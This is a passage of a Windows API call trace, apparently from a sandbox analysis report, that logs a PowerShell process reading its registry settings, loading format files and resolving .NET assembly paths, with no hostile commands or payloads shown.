	[0576.854] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2fc) returned 0x0
	[0576.854] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0576.854] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c9960
	[0576.854] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x1b7c9960, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0576.854] CoTaskMemFree (pv=0x1b7c9960) 
	[0576.855] RegCloseKey (hKey=0x2fc) returned 0x0
	[0576.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.859] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x1d789b16, Data2=0x83df, Data3=0x42e7, Data4=([0]=0x9b, [1]=0x3, [2]=0x32, [3]=0xba, [4]=0x2f, [5]=0xef, [6]=0xb7, [7]=0x6a))) returned 0x0
	[0578.688] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x80ba5122, Data2=0x7058, Data3=0x4161, Data4=([0]=0x9d, [1]=0x91, [2]=0xd8, [3]=0xb9, [4]=0xc9, [5]=0x4d, [6]=0xe, [7]=0x48))) returned 0x0
	[0578.690] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0578.690] GetFileType (hFile=0x2fc) returned 0x1
	[0578.690] SetErrorMode (uMode=0x1) returned 0x1
	[0578.690] GetFileType (hFile=0x2fc) returned 0x1
	[0578.690] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.691] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.691] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.692] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.692] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0xfb2, lpOverlapped=0x0) returned 1
	[0578.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224472, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224472*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0578.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x3224d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3224d58*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0578.695] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2fc) returned 0x0
	[0578.695] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0578.695] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c9f10
	[0578.695] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x1b7c9f10, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0578.695] CoTaskMemFree (pv=0x1b7c9f10) 
	[0578.695] RegCloseKey (hKey=0x2fc) returned 0x0
	[0578.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0578.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0578.698] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa73c64c0, Data2=0x3347, Data3=0x42f5, Data4=([0]=0xb8, [1]=0x8c, [2]=0x44, [3]=0xca, [4]=0xaf, [5]=0xd7, [6]=0x23, [7]=0x4f))) returned 0x0
	[0578.699] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xf90f6ba7, Data2=0x715c, Data3=0x4d73, Data4=([0]=0x8b, [1]=0x6c, [2]=0x62, [3]=0xc4, [4]=0x2e, [5]=0x28, [6]=0xe6, [7]=0xd1))) returned 0x0
	[0578.700] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xe6fdb865, Data2=0x49af, Data3=0x499b, Data4=([0]=0xa4, [1]=0x5c, [2]=0x39, [3]=0xd4, [4]=0x7d, [5]=0xe0, [6]=0x25, [7]=0x87))) returned 0x0
	[0578.700] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xb0e8e93f, Data2=0xc9b2, Data3=0x4ec2, Data4=([0]=0x90, [1]=0x3b, [2]=0x6d, [3]=0x9f, [4]=0xb1, [5]=0x7a, [6]=0x95, [7]=0xaf))) returned 0x0
	[0578.700] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x111a558d, Data2=0xf89b, Data3=0x4b63, Data4=([0]=0xbc, [1]=0x9a, [2]=0x13, [3]=0xd5, [4]=0x5b, [5]=0xd6, [6]=0x66, [7]=0x5e))) returned 0x0
	[0578.701] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc4a634cd, Data2=0x4ff6, Data3=0x47c7, Data4=([0]=0x98, [1]=0x95, [2]=0x81, [3]=0xc3, [4]=0x22, [5]=0x7d, [6]=0x5b, [7]=0x2c))) returned 0x0
	[0578.701] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0578.701] GetFileType (hFile=0x2fc) returned 0x1
	[0578.701] SetErrorMode (uMode=0x1) returned 0x1
	[0578.701] GetFileType (hFile=0x2fc) returned 0x1
	[0578.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0578.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0xaca, lpOverlapped=0x0) returned 1
	[0578.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x32700ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32700ea*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0578.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x3270ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3270ab8*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0578.706] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2fc) returned 0x0
	[0578.706] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0578.706] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c9f10
	[0578.706] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x1b7c9f10, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0578.706] CoTaskMemFree (pv=0x1b7c9f10) 
	[0578.706] RegCloseKey (hKey=0x2fc) returned 0x0
	[0578.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0578.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0578.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0578.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0578.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0578.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0580.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0580.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0580.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0580.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0580.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0580.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0580.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0580.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0580.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0580.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0580.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0580.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0580.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0582.272] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x5b239515, Data2=0x145f, Data3=0x4f6e, Data4=([0]=0x99, [1]=0xec, [2]=0x78, [3]=0x94, [4]=0xeb, [5]=0x4e, [6]=0x7f, [7]=0x15))) returned 0x0
	[0582.273] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x88ec9301, Data2=0x4ac0, Data3=0x4884, Data4=([0]=0x8d, [1]=0xde, [2]=0x34, [3]=0x96, [4]=0xb6, [5]=0x18, [6]=0x57, [7]=0x97))) returned 0x0
	[0582.274] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xb0f2fbfc, Data2=0x28ff, Data3=0x4527, Data4=([0]=0x96, [1]=0x96, [2]=0xea, [3]=0xd6, [4]=0x11, [5]=0x90, [6]=0x7e, [7]=0xc3))) returned 0x0
	[0582.274] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x13f13114, Data2=0x48f8, Data3=0x4ce3, Data4=([0]=0x8f, [1]=0x7, [2]=0xc5, [3]=0x7f, [4]=0x61, [5]=0x28, [6]=0x5f, [7]=0x89))) returned 0x0
	[0583.693] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xcb3da182, Data2=0x61df, Data3=0x43fb, Data4=([0]=0xad, [1]=0xbf, [2]=0xa9, [3]=0x98, [4]=0x4d, [5]=0x7c, [6]=0xca, [7]=0x18))) returned 0x0
	[0583.693] VirtualQuery (in: lpAddress=0x22b530, lpBuffer=0x22c3f0, dwLength=0x30 | out: lpBuffer=0x22c3f0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0583.693] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x17addeca, Data2=0xd4e3, Data3=0x47fd, Data4=([0]=0xa0, [1]=0xab, [2]=0xee, [3]=0xca, [4]=0x49, [5]=0x31, [6]=0x3a, [7]=0x6e))) returned 0x0
	[0583.694] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc359792d, Data2=0x892, Data3=0x4a74, Data4=([0]=0xb1, [1]=0x8e, [2]=0x73, [3]=0xc1, [4]=0xbf, [5]=0xe8, [6]=0x1b, [7]=0x80))) returned 0x0
	[0583.694] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0583.694] GetFileType (hFile=0x2f8) returned 0x1
	[0583.694] SetErrorMode (uMode=0x1) returned 0x1
	[0583.694] GetFileType (hFile=0x2f8) returned 0x1
	[0583.694] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.695] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.695] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.695] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.696] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.696] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.698] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.698] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.699] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.699] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.699] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.700] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.700] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.700] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.700] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.700] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
